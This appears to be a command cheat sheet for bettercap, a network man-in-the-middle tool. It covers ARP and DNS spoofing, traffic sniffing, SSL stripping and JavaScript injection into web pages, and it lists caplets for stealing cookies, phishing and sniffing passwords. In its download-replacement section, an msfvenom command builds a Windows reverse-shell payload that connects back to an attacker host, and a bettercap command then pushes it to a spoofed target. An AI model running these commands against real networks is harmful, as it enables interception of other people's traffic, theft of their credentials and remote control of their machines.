A Etter­cap suc­ces­sor, writ­ten in Go. Basic commands:

• Pas­sive ARP probing:
  • net.recon on
  • net.recon off
• Active prob­ing:
  • net.probe on
  • net.probe off
• Sniff­ing:
  • set net.sniff.output /tmp/sniff.pcap // optional
  • net.sniff on
  • net.sniff off
• Spoof­ing:
  • set arp.spoof.targets $target1, $target2, $target3
  • arp.spoof on
  • arp.spoof off
• DNS Spoof­ing:
  • set dns.spoof.domains target.domain // the domain which should be resolved as…
  • set dns.spoof.address $attacker_ip // this IP.
  • dns.spoof on
  • dns.spoof off
• net.show // all hosts
• net.show $ip_address // details about one host

Automa­tion:

• Repeat a set of com­mands reg­u­lar­ly. The fol­low­ing shows an updat­ed host dis­cov­ery list each 8 sec­onds.
  set ticker.period 8
set ticker.commands "clear; net.show;"
• Put a set of com­mands into a Caplet and exe­cute it directly.
  1. Cre­ate a Caplet file:
     events.clear
set ...
net.sniff on
  2. Exe­cute bet­ter­cap:
     # bettercap -caplet caplet-file.caplet

HTTP(S) proxy

• HTTP proxy
  • set http.proxy.sslstrip true // Replaces each https reference
  • http.proxy on
  • http.proxy off
• HTTPS proxy
  • set https.proxy.sslstrip true // Replaces each https reference
  • https.proxy on
  • https.proxy off

Inject JavaScript into HTTP responses

Start spoof­ing and set injectjs:

set http.proxy.injectjs "console.log('aha');"
http.proxy on

This cre­ates a proxy on the local sys­tem. All (HTML?) con­tent is added with the pro­vid­ed JS.

curl -x http://192.168.178.29:8080/ http://naturtrunken.de/
...
<html>...<script type="text/javascript">console.log('aha');</script>...</html>

Replace downloaded files

You want to replace a file a user wants to down­load from anoth­er serv­er with your own file.

1. Cre­ate suit­able pay­loads for the tar­get plat­tforms and store them into the autop­wn direc­to­ry. In case of x64-Win­dows:
   msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=$attacker LPORT=443 -f exe -o /usr/share/bettercap/caplets/download-autopwn/windows/payload.exe
2. Start bet­ter­cap:
   # bettercap -caplet /usr/share/bettercap/caplets/download-autopwn/download-autopwn.cap -eval 'events.ignore endpoint; set arp.spoof.targets $target; arp.spoof on'

Caplets

There are some Caplets avail­able. Update them with caplets.update and show them with caplets.show. Note that by default all traf­fic is spoofed; there­fore it’s bet­ter to use the caplets like this:

# bettercap -caplet /usr/local/share/bettercap/caplets/steal-cookies/steal-cookies.cap -eval "set arp.spoof.targets $target"

Avail­able Caplets at 2021/05:

┌─────────────────────────────────────┬──────────────────────────────────────────────────────────────────────┬────────┐
│ Name │ Path │ Size │
├─────────────────────────────────────┼──────────────────────────────────────────────────────────────────────┼────────┤
│ ap │ /usr/share/bettercap/caplets/ap.cap │ 570 B │
│ crypto-miner/crypto-miner │ /usr/share/bettercap/caplets/crypto-miner/crypto-miner.cap │ 666 B │
│ download-autopwn/download-autopwn │ /usr/share/bettercap/caplets/download-autopwn/download-autopwn.cap │ 2.6 kB │
│ fb-phish/fb-phish │ /usr/share/bettercap/caplets/fb-phish/fb-phish.cap │ 140 B │
│ gitspoof/gitspoof │ /usr/share/bettercap/caplets/gitspoof/gitspoof.cap │ 216 B │
│ gps │ /usr/share/bettercap/caplets/gps.cap │ 109 B │
│ hstshijack/hstshijack │ /usr/share/bettercap/caplets/hstshijack/hstshijack.cap │ 1.2 kB │
│ http-req-dump/http-req-dump │ /usr/share/bettercap/caplets/http-req-dump/http-req-dump.cap │ 591 B │
│ http-ui │ /usr/share/bettercap/caplets/http-ui.cap │ 376 B │
│ https-ui │ /usr/share/bettercap/caplets/https-ui.cap │ 655 B │
│ jsinject/jsinject │ /usr/share/bettercap/caplets/jsinject/jsinject.cap │ 210 B │
│ local-sniffer │ /usr/share/bettercap/caplets/local-sniffer.cap │ 244 B │
│ login-manager-abuse/login-man-abuse │ /usr/share/bettercap/caplets/login-manager-abuse/login-man-abuse.cap │ 236 B │
│ mana │ /usr/share/bettercap/caplets/mana.cap │ 61 B │
│ massdeauth │ /usr/share/bettercap/caplets/massdeauth.cap │ 302 B │
│ mitm6 │ /usr/share/bettercap/caplets/mitm6.cap │ 551 B │
│ netmon │ /usr/share/bettercap/caplets/netmon.cap │ 42 B │
│ pita │ /usr/share/bettercap/caplets/pita.cap │ 900 B │
│ proxy-script-test/proxy-script-test │ /usr/share/bettercap/caplets/proxy-script-test/proxy-script-test.cap │ 57 B │
│ pwnagotchi-auto │ /usr/share/bettercap/caplets/pwnagotchi-auto.cap │ 330 B │
│ pwnagotchi-manual │ /usr/share/bettercap/caplets/pwnagotchi-manual.cap │ 440 B │
│ rogue-mysql-server │ /usr/share/bettercap/caplets/rogue-mysql-server.cap │ 501 B │
│ rtfm/rtfm │ /usr/share/bettercap/caplets/rtfm/rtfm.cap │ 210 B │
│ simple-passwords-sniffer │ /usr/share/bettercap/caplets/simple-passwords-sniffer.cap │ 131 B │
│ steal-cookies/steal-cookies │ /usr/share/bettercap/caplets/steal-cookies/steal-cookies.cap │ 134 B │
│ tcp-req-dump/tcp-req-dump │ /usr/share/bettercap/caplets/tcp-req-dump/tcp-req-dump.cap │ 413 B │
│ web-override/web-override │ /usr/share/bettercap/caplets/web-override/web-override.cap │ 254 B │
└─────────────────────────────────────┴──────────────────────────────────────────────────────────────────────┴────────┘